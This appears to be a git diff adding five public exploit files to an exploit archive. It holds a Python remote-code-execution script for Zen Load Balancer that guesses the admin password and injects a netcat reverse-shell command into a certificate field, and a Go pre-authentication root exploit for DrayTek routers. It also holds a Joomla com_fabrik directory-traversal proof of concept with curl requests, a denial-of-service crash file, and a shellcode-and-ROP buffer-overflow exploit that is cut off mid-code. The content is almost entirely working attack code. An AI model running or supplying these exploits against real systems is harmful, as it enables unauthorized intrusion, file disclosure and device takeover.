diff --git a/exploits/cgi/webapps/48266.py b/exploits/cgi/webapps/48266.py new file mode 100755 index 000000000..b8d533935 --- /dev/null +++ b/exploits/cgi/webapps/48266.py @@ -0,0 +1,110 @@ +# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution +# Google Dork: no +# Date: 2020-03-28 +# Exploit Author: Cody Sixteen +# Vendor Homepage: https://code610.blogspot.com +# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download +# Version: 3.10.1 +# Tested on: Linux +# CVE : CVE-2019-7301 + +#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py +#!/usr/bin/env python +# zenload3r.py - zen load balancer pwn3r +# 28.03.2020 @ 22:41 +# +# by cody sixteen +# + +import base64 +import sys, re +import requests +import ssl +from functools import partial +ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1) +# disable ssl warnings: +import urllib3 +urllib3.disable_warnings() +from requests.auth import HTTPBasicAuth + +# +target = sys.argv[1] +username = 'admin' +password = 'P@ssw0rd' + +def main(): + print 'zenload3r.py - zen load balancer pwn3r' + print ' zenload3r.py - vs - %s' % ( target ) + print '' + + print '[+] checking if host is alive...' + global sess + sess = requests.session() + global baseUrl + baseUrl = target + ':444/index.cgi' + checkBaseUrl = sess.get(baseUrl, verify=False) + checkBaseResp = checkBaseUrl.status_code + + #print checkBaseResp + if checkBaseResp == 401: + print '[i] ...it is. we need to log in to proceed' + logmein(baseUrl) + + +def logmein(target): + print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl) + + #pwd_file = '/usr/share/wordlists/dirb/common.txt' + pwd_file = 'passwd.lst' + + try: + read_pwds = open(pwd_file, 'r') + pwds = read_pwds.readlines() + + for pwd in pwds: + pwd = pwd.rstrip() + logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True) + logmeresp = logme.text + + #print logmeresp + if '

Hello admin' in logmeresp: + print '[+] admin user logged-in! :D' + print '[+] working password: %s' % ( pwd ) + + load3r(baseUrl, pwd) + + except requests.exceptions.ConnectionError: + print '[-] Can not connect to remote host :C\n' + + +def load3r(baseUrl, pwd): + print '[+] time to get reverse shell, preparing...' + + creds = base64.b64encode("{}:{}".format(username,pwd)) + creds2 = creds.rstrip() + print 'creds: ', creds2 + + baseUrl = "https://192.168.1.200:444/index.cgi" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444", + "Authorization": "Basic {}".format(creds2), "Connection": "close", + "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1" + } + sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#" + reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel", + "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe", + "cert_organization": sh, + "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe", + "cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com", + "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"} + + requests.post(baseUrl, headers=headers, data=reqdata,verify=False) + + print '[*] got r00t? ;>\n' + + +# run me: +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/remote/48268.go b/exploits/linux/remote/48268.go new file mode 100755 index 000000000..88ed03305 --- /dev/null +++ b/exploits/linux/remote/48268.go @@ -0,0 +1,87 @@ +package main + + +/* +CVE-2020-8515: DrayTek pre-auth remote root RCE +Mon Mar 30 2020 - 0xsha.io +Affected: +DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, +and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, +and 1.4.4_Beta +You should upgrade as soon as possible to 1.5.1 firmware or later +This issue has been fixed in Vigor3900/2960/300B v1.5.1. +read more : +https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html +https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ +https://thehackernews.com/2020/03/draytek-network-hacking.html +https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ +exploiting using keyPath +POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Host: 1.2.3.4 +Content-Length: 89 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close +action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + */ + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/url" + "os" + "strings" +) + +func usage() { + + fmt.Println("CVE-2020-8515 exploit by @0xsha ") + fmt.Println("Usage : " + os.Args[0] + " URL " + "command" ) + fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" ) +} + +func main() { + + + if len(os.Args) < 3 { + usage() + os.Exit(-1) + } + + targetUrl := os.Args[1] + //cmd := "cat /etc/passwd" + cmd := os.Args[2] + + + // payload preparation + vulnerableFile := "/cgi-bin/mainfunction.cgi" + // specially crafted CMD + // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + payload :=`' + /bin/sh -c 'CMD' + '` + payload = strings.ReplaceAll(payload,"CMD", cmd) + bypass := strings.ReplaceAll(payload," ", "${IFS}") + + //PostForm call url encoder internally + resp, err := http.PostForm(targetUrl+vulnerableFile , + url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} }) + + if err != nil{ + fmt.Println("error connecting host") + os.Exit(-1) + } + + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + + if err != nil{ + fmt.Println("error reading data") + os.Exit(-1) + } + + fmt.Println(string(body)) + +} \ No newline at end of file diff --git a/exploits/php/webapps/48263.txt b/exploits/php/webapps/48263.txt new file mode 100644 index 000000000..826d6f5d6 --- /dev/null +++ b/exploits/php/webapps/48263.txt @@ -0,0 +1,65 @@ +# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal +#Google Dork: inurl:"index.php?option=com_fabrik" +#Date: 2020-03-30 +#Exploit Author: qw3rTyTy +#Vendor Homepage: https://fabrikar.com/ +#Software Link: https://fabrikar.com/downloads +#Version: 3.9 +#Tested on: Debian/Nginx/Joomla! 3.9.11 +################################################################## +#Vulnerability details +################################################################## +File: fabrik_element/image/image.php +Func: onAjax_files + + 394 public function onAjax_files() + 395 { + 396 $this->loadMeForAjax(); + 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal. + 398 + 399 if (!strstr($folder, JPATH_SITE)) + 400 { + 401 $folder = JPATH_SITE . '/' . $folder; + 402 } + 403 + 404 $pathA = JPath::clean($folder); + 405 $folder = array(); + 406 $files = array(); + 407 $images = array(); + 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders); + 409 + 410 if (!array_key_exists('/', $images)) + 411 { + 412 $images['/'] = array(); + 413 } + 414 + 415 echo json_encode($images['/']); + 416 } +################################################################## +#PoC +################################################################## +$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/" + +...snip... +[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}] +...snip... + +$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/" + +...snip... +[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] +...snip... +################################################################## +#Q&D Patch (DO NOT USE :3) +################################################################## +--- ./image.php --- ++++ image_patched.php --- +@@ -394,7 +394,7 @@ + public function onAjax_files() + { + $this->loadMeForAjax(); +- $folder = $this->app->input->get('folder', '', 'string'); ++ $folder = $this->app->input->get('folder', '', 'cmd'); + + if (!strstr($folder, JPATH_SITE)) + { \ No newline at end of file diff --git a/exploits/windows/dos/48262.py b/exploits/windows/dos/48262.py new file mode 100755 index 000000000..98179dd17 --- /dev/null +++ b/exploits/windows/dos/48262.py @@ -0,0 +1,25 @@ +# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2020-03-27 +# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/ +# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3 +# Version : Odin Secure FTP Expert 7.6.3 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Home Single Lenguage (ESP) + +Steps to Produce the Crash: + + 1.- Run python code: OdinSecureFTP.py + 2.- Copy content to clipboard + 3.- Open "OdinSecureFTPExpert.exe" + 4.- Go to "Trial" > Connect > Quickconnect site + 5.- Paste ClipBoard into the all fields + 6.- Go to Connect + 7.- Crashed + +Python "OdinSecureFTP" Code: + +buffer = "\x41" * 108 +f = open ("OdinSecureFTP.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48264.py b/exploits/windows/local/48264.py new file mode 100755 index 000000000..e6ad38b43 --- /dev/null +++ b/exploits/windows/local/48264.py @@ -0,0 +1,141 @@ +# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) +# Date: 2020-03-30 +# Exploit Author: Hodorsec +# Version: 9.03 +# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe +# Vendor Homepage: https://www.10-strike.com +# Tested on: Win8.1 x64 - Build 9600 + +# Description: +# - Exploits the functionality to load a list of computers from a file +# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP +# - Used a jump after ROP to go to a buffer for more space + +# Reproduction: +# - Run the script, a TXT file will be generated +# - Open the program and click on tab "Computers" +# - Click the button "From Text File" and select the generated TXT file +# - Clck OK and check results + +# WinDBG initial crash output: +# (f54.f48): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe +# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000 +# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203 +# NetworkInventoryExplorer+0x2b47: +# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] +# 0:000> g +# (f54.f48): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388 +# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 +# 41414141 ?? ??? + + +#!/usr/bin/python + +import sys, struct + +filename = "poc_10_strike_nie.txt" + +# Maximum length +maxlen = 5000 + +# Offsets +crash_esi = 2145 # Initial space until ESI buffer filling +crash_seh = 217 # SEH +crash_nseh = crash_seh - 4 # NSEH +landingpad = 310 # Space for RET NOP landingpad after stackpivoting + +# Shellcode +# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread +# Payload size: 220 bytes +shellcode = b"" +shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06" +shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14" +shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02" +shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb" +shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e" +shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b" +shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0" +shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5" +shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50" +shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94" +shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87" +shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce" +shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12" +shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf" +shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1" +shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9" +shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8" +shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82" +shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68" +shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f" + +# ROP chain +def create_rop_chain(): + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x7c344efe, # POP EDX # RETN [MSVCR71.dll] + 0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll] + 0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe] + 0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] + 0x61e7555f, # POP EBP # RETN [sqlite3.dll] + 0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll] + 0x7c37678f, # POP EAX # RETN [MSVCR71.dll] + 0xfffffdff, # Value to negate, will become 0x00000201 + 0x7c34d749, # NEG EAX # RETN [MSVCR71.dll] + 0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe] + 0xffffffff, # + 0x61e0579d, # INC EBX # RETN [sqlite3.dll] + 0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] + 0x7c3458e6, # POP EDX # RETN [MSVCR71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll] + 0x7c369c4a, # POP ECX # RETN [MSVCR71.dll] + 0x7c38dfd7, # &Writable location [MSVCR71.dll] + 0x7c34a40e, # POP EDI # RETN [MSVCR71.dll] + 0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe] + 0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe] + 0x90909090, # nop + 0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe] + ] + return ''.join(struct.pack('